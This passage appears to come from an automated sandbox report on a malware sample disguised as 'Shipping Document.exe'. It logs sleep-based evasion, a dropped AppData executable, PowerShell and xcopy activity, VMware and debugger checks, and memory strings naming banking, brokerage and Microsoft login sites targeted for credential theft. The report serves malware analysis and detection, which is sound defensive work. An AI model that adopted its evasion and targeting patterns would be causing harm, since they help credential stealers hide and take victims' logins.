                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238813Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238688Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238547Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238407Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238235Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239657Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239485Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239340Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239214Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239079Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238969Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238813Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238542Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238391Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238260Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237474Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237325Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237213Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 236922Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeWindow / User API: threadDelayed 1343Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeWindow / User API: threadDelayed 718Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3802Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5123Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeWindow / User API: threadDelayed 1419Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeWindow / User API: threadDelayed 1082Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 870
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 9104
                Source: C:\Users\user\Desktop\Shipping Document.exeAPI coverage: 0.7 %
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeAPI coverage: 0.2 %
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239852s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239622s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239274s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -239053s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -238938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -238813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -238688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -238547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -238407s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664Thread sleep time: -238235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 4816Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1204Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep count: 5123 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep count: 308 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -239657s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -239485s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -239340s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -239214s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -239079s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238969s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238813s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238672s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238542s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238391s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238260s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -238156s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -237474s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -237325s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -237213s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -237093s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932Thread sleep time: -236922s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 7068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe TID: 7596Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe TID: 7596Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520Thread sleep count: 870 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520Thread sleep time: -1740000s >= -30000s
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520Thread sleep count: 9104 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520Thread sleep time: -18208000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239852Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239735Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239622Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239516Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239391Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239274Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239172Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 239053Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238938Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238813Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238688Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238547Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238407Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 238235Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239657Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239485Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239340Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239214Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 239079Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238969Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238813Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238672Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238542Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238391Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238260Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237474Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237325Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237213Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 237093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 236922Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 354xH8-mR.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 354xH8-mR.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: KOENBvWt.exe, 0000000C.00000002.1390429470.000000000834A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 354xH8-mR.22.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 354xH8-mR.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 354xH8-mR.22.drBinary or memory string: discord.comVMware20,11696492231f
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3691603139.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.1733419744.000001DB1F05D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 354xH8-mR.22.drBinary or memory string: global block list test formVMware20,11696492231
                Source: Shipping Document.exe, 00000000.00000002.1267858070.0000000000C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 354xH8-mR.22.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 354xH8-mR.22.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 354xH8-mR.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 354xH8-mR.22.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 354xH8-mR.22.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 354xH8-mR.22.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu"W
                Source: 354xH8-mR.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 354xH8-mR.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 354xH8-mR.22.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 354xH8-mR.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 354xH8-mR.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 354xH8-mR.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 0_2_00B51AD0 CheckRemoteDebuggerPresent,0_2_00B51AD0
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114096E rdtsc 10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_00417953 LdrLoadDll,10_2_00417953
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AA118 mov ecx, dword ptr fs:[00000030h]10_2_011AA118
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AA118 mov eax, dword ptr fs:[00000030h]10_2_011AA118
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AA118 mov eax, dword ptr fs:[00000030h]10_2_011AA118
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AA118 mov eax, dword ptr fs:[00000030h]10_2_011AA118
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C0115 mov eax, dword ptr fs:[00000030h]10_2_011C0115
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]10_2_011AE10E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01130124 mov eax, dword ptr fs:[00000030h]10_2_01130124
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01198158 mov eax, dword ptr fs:[00000030h]10_2_01198158
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106154 mov eax, dword ptr fs:[00000030h]10_2_01106154
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106154 mov eax, dword ptr fs:[00000030h]10_2_01106154
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC156 mov eax, dword ptr fs:[00000030h]10_2_010FC156
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]10_2_01194144
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]10_2_01194144
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01194144 mov ecx, dword ptr fs:[00000030h]10_2_01194144
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]10_2_01194144
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]10_2_01194144
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4164 mov eax, dword ptr fs:[00000030h]10_2_011D4164
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4164 mov eax, dword ptr fs:[00000030h]10_2_011D4164
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]10_2_0118019F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]10_2_0118019F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]10_2_0118019F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]10_2_0118019F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01140185 mov eax, dword ptr fs:[00000030h]10_2_01140185
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BC188 mov eax, dword ptr fs:[00000030h]10_2_011BC188
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BC188 mov eax, dword ptr fs:[00000030h]10_2_011BC188
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA197 mov eax, dword ptr fs:[00000030h]10_2_010FA197
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA197 mov eax, dword ptr fs:[00000030h]10_2_010FA197
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA197 mov eax, dword ptr fs:[00000030h]10_2_010FA197
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A4180 mov eax, dword ptr fs:[00000030h]10_2_011A4180
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A4180 mov eax, dword ptr fs:[00000030h]10_2_011A4180
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov ecx, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C61C3 mov eax, dword ptr fs:[00000030h]10_2_011C61C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C61C3 mov eax, dword ptr fs:[00000030h]10_2_011C61C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011301F8 mov eax, dword ptr fs:[00000030h]10_2_011301F8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D61E5 mov eax, dword ptr fs:[00000030h]10_2_011D61E5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01184000 mov ecx, dword ptr fs:[00000030h]10_2_01184000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196030 mov eax, dword ptr fs:[00000030h]10_2_01196030
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA020 mov eax, dword ptr fs:[00000030h]10_2_010FA020
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC020 mov eax, dword ptr fs:[00000030h]10_2_010FC020
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102050 mov eax, dword ptr fs:[00000030h]10_2_01102050
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186050 mov eax, dword ptr fs:[00000030h]10_2_01186050
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112C073 mov eax, dword ptr fs:[00000030h]10_2_0112C073
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110208A mov eax, dword ptr fs:[00000030h]10_2_0110208A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C60B8 mov eax, dword ptr fs:[00000030h]10_2_011C60B8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C60B8 mov ecx, dword ptr fs:[00000030h]10_2_011C60B8
